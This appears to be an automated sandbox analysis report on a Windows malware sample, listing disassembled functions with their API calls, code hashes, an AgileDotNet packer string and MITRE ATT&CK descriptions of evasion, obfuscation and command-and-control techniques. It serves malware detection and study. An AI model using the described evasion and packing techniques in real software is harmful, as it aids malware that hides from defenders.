Opcode Fuzzy Hash: 6947872f01eb5e6eedf7bcccf6aeede4d7ca020c34320d71c4175c94c52ef6f5
Instruction Fuzzy Hash: 11C1F63661DB858AEB64CB19E4903AEB7A0F7C8784F115066EA8D87B69DF3CD441CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACCD8F0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 200memorystringCOMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32 ref: 00007FFD7ACCD8FF
lstrlenW.KERNEL32 ref: 00007FFD7ACCD90F
GetProcessHeap.KERNEL32 ref: 00007FFD7ACCD929
HeapAlloc.KERNEL32 ref: 00007FFD7ACCD93C
lstrcpyW.KERNEL32 ref: 00007FFD7ACCD96C

Strings

, xrefs: 00007FFD7ACCDBE7

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Heap$AllocCommandLineProcesslstrcpylstrlen
String ID:
API String ID: 3105795567-3916222277
Opcode ID: 2359e678ae424cbce53370bb925576181af0ec3f9524b1bb2f86988de5593bea
Instruction ID: f56b79d0ce0c64e4c70ef9636953f3a1957e210e9199097e4cdec2c62c6b8b6f
Opcode Fuzzy Hash: 2359e678ae424cbce53370bb925576181af0ec3f9524b1bb2f86988de5593bea
Instruction Fuzzy Hash: E9A1EE2B71DB0591EB758B16E4A023E77A0FBC8BA8F150166EA8D87778DF2CD550CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC99D0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45filethreadCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FFD7ACC9A04
GetCurrentThreadId.KERNEL32 ref: 00007FFD7ACC9A27
GetCurrentProcessId.KERNEL32 ref: 00007FFD7ACC9A6E
GetCurrentProcess.KERNEL32 ref: 00007FFD7ACC9A78
CloseHandle.KERNEL32 ref: 00007FFD7ACC9ABB

Strings

MiniDump.dmp, xrefs: 00007FFD7ACC99FD

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Current$Process$CloseCreateFileHandleThread
String ID: MiniDump.dmp
API String ID: 2270032372-271895303
Opcode ID: 9452c33c4a2cfbd67393f2678b40260db12f53f62b237d8a5ad54e5f379a9bc0
Instruction ID: f8b6704d9080e6763160c3f7dc4035699b6346971e42935c797c00a47b0894cd
Opcode Fuzzy Hash: 9452c33c4a2cfbd67393f2678b40260db12f53f62b237d8a5ad54e5f379a9bc0
Instruction Fuzzy Hash: EF21E43AA1CB8196E3648B15F46831EB7B0F785754F204269E6DE46BA8DF7DD448CF00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC3830, Relevance: 10.5, APIs: 7, Instructions: 35COMMON

Download Yara Rule

APIs

UnDecorator::getCallIndex.LIBCMTD ref: 00007FFD7ACC3845
UnDecorator::getCallIndex.LIBCMTD ref: 00007FFD7ACC3858
UnDecorator::getCallIndex.LIBCMTD ref: 00007FFD7ACC386B
UnDecorator::getCallIndex.LIBCMTD ref: 00007FFD7ACC387E
UnDecorator::getCallIndex.LIBCMTD ref: 00007FFD7ACC3891
UnDecorator::getCallIndex.LIBCMTD ref: 00007FFD7ACC38A4
UnDecorator::getCallIndex.LIBCMTD ref: 00007FFD7ACC38B7

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: CallDecorator::getIndex
String ID:
API String ID: 627293820-0
Opcode ID: 21f29a958f93da1d0409b9acc7ca347e0b99c1e099982ad00d2c2683a4c408c9
Instruction ID: 0ee811f451ca9f0fd2e2e1a1da32a1009bb7ed8b6ce2e60ab31e8bdd3869bfa2
Opcode Fuzzy Hash: 21f29a958f93da1d0409b9acc7ca347e0b99c1e099982ad00d2c2683a4c408c9
Instruction Fuzzy Hash: 59010C96F3974AA2DE48A79BE06276E5364EFC5B80F4010B6F94E0B766DE2DC0118740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC3D80, Relevance: 9.1, APIs: 6, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FFD7ACC3DA1
OpenProcess.KERNEL32 ref: 00007FFD7ACC3DB1
EnumProcessModules.PSAPI ref: 00007FFD7ACC3DE0
GetModuleFileNameExW.PSAPI ref: 00007FFD7ACC3E4A
CloseHandle.KERNEL32 ref: 00007FFD7ACC3EFA

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Process$CloseCurrentEnumFileHandleModuleModulesNameOpen
String ID:
API String ID: 4110801219-0
Opcode ID: 29f9ef35d9fa229e6e14247f9647892d993d11f7be9c7c4a960a35017c30abf0
Instruction ID: f7e51acf345b6e8bca56fb1cf7a225755f881f41a28a566524c2f8b64a97bb50
Opcode Fuzzy Hash: 29f9ef35d9fa229e6e14247f9647892d993d11f7be9c7c4a960a35017c30abf0
Instruction Fuzzy Hash: 4841213B72DA81A5E738DB15F4542AEA3A4FBC8784F454076E68D8BB69DF3CD5408B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC9B80, Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FFD7ACC9BAD
VirtualProtect.KERNEL32 ref: 00007FFD7ACC9BCD
LeaveCriticalSection.KERNEL32 ref: 00007FFD7ACC9BE2
VirtualProtect.KERNEL32 ref: 00007FFD7ACC9C19

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Virtual$Protect$CriticalLeaveQuerySection
String ID:
API String ID: 2006288-0
Opcode ID: 2b980eb649ec53045a63e51cd951dd99928a548526f7095e8bc86501aea3cfa8
Instruction ID: c4e0fbf9f73a4e10aa67855da31f0ae6031687060cb6f1001e922229f0873344
Opcode Fuzzy Hash: 2b980eb649ec53045a63e51cd951dd99928a548526f7095e8bc86501aea3cfa8
Instruction Fuzzy Hash: EB11963A628A80D2DB108B5AE45471EB7A0F7C9B94F504166EB8D47B78CF3DD545CF00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC9AD0, Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FFD7ACC9AEE
VirtualProtect.KERNEL32 ref: 00007FFD7ACC9B0E
EnterCriticalSection.KERNEL32 ref: 00007FFD7ACC9B20
VirtualProtect.KERNEL32 ref: 00007FFD7ACC9B58

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Virtual$Protect$CriticalEnterQuerySection
String ID:
API String ID: 2670832257-0
Opcode ID: e1714ad717440deeff28738d820c447a2055e31fae03be0938bd606c55f0f9db
Instruction ID: a0feb5bcd909e226d7beca4cca2b4ad9b1fff235a23869859f6f757711ef7e25
Opcode Fuzzy Hash: e1714ad717440deeff28738d820c447a2055e31fae03be0938bd606c55f0f9db
Instruction Fuzzy Hash: B7015E7A628A80D2EA10CB5AE45461EB7A4F7C8B94F504126EBCE47B38CF3CC555CF00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC3020, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FFD7ACC3046

Part of subcall function 00007FFD7ACCDFB0: ExitProcess.KERNEL32 ref: 00007FFD7ACCDFC1

Strings

This application requires .NET Framework 2.0 in order to run properly. Please verify that .NET framework 2.0 is installed on the, xrefs: 00007FFD7ACC303D
AgileDotNet, xrefs: 00007FFD7ACC3036

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: ExitMessageProcess
String ID: AgileDotNet$This application requires .NET Framework 2.0 in order to run properly. Please verify that .NET framework 2.0 is installed on the
API String ID: 1220098344-543017848
Opcode ID: cd47d4f85eaa66ed69660d213c8db52efbd95b492654d602864fce2cef43d99b
Instruction ID: 2b75e0fcd985c09190dd4eb2ec1995fee835bedacae3b2c65bedd5a175d16171
Opcode Fuzzy Hash: cd47d4f85eaa66ed69660d213c8db52efbd95b492654d602864fce2cef43d99b
Instruction Fuzzy Hash: F0D05B6EF2920371F60C635A64712FC51507F54344FC100B2E00E4D1B6ED1CE2458354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACC8B80, Relevance: 5.0, APIs: 4, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFD7ACC8BE1
HeapFree.KERNEL32 ref: 00007FFD7ACC8BF1
GetProcessHeap.KERNEL32 ref: 00007FFD7ACC8C06
HeapFree.KERNEL32 ref: 00007FFD7ACC8C19

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 6c57f155ad9c1a148ec0ba613c2301cec699e2a480721c1112e22a2045feb406
Instruction ID: 32e3232707a9dad599cb5ddb5bc67b13ae42eb88cde5e6bc68ae092ea63ef3a7
Opcode Fuzzy Hash: 6c57f155ad9c1a148ec0ba613c2301cec699e2a480721c1112e22a2045feb406
Instruction Fuzzy Hash: A2113B7AA28B45D2D654DB5AE49432EB7A0FBC8B85F004136EA8E47774DF7CD0418B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD7ACCD7B0, Relevance: 5.0, APIs: 4, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFD7ACCD7C6
HeapReAlloc.KERNEL32 ref: 00007FFD7ACCD7DB
GetProcessHeap.KERNEL32 ref: 00007FFD7ACCD7E5
HeapAlloc.KERNEL32 ref: 00007FFD7ACCD7F5

Memory Dump Source

Source File: 00000000.00000002.356811508.00007FFD7ACC1000.00000020.00020000.sdmp, Offset: 00007FFD7ACC0000, based on PE: true

Associated: 00000000.00000002.356734964.00007FFD7ACC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.356964212.00007FFD7ACD0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357013594.00007FFD7ACD2000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357041645.00007FFD7ACD3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357097464.00007FFD7ACD5000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.357133933.00007FFD7ACD6000.00000080.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 720372e3461abeb0e97737b902e66e85bc2beec6faac03b5670fc4f1b266ddef
Instruction ID: ac262de7becd4a4f6f09e2eebc038878a9e4d9adb667dc3e474ef3592d25fd55
Opcode Fuzzy Hash: 720372e3461abeb0e97737b902e66e85bc2beec6faac03b5670fc4f1b266ddef
Instruction Fuzzy Hash: F9E0302AE29A82E1E64CEB67B41836DA7A0FFC8741F004075E98F46638DF3CD0448700

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report bPNK0VeG79.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back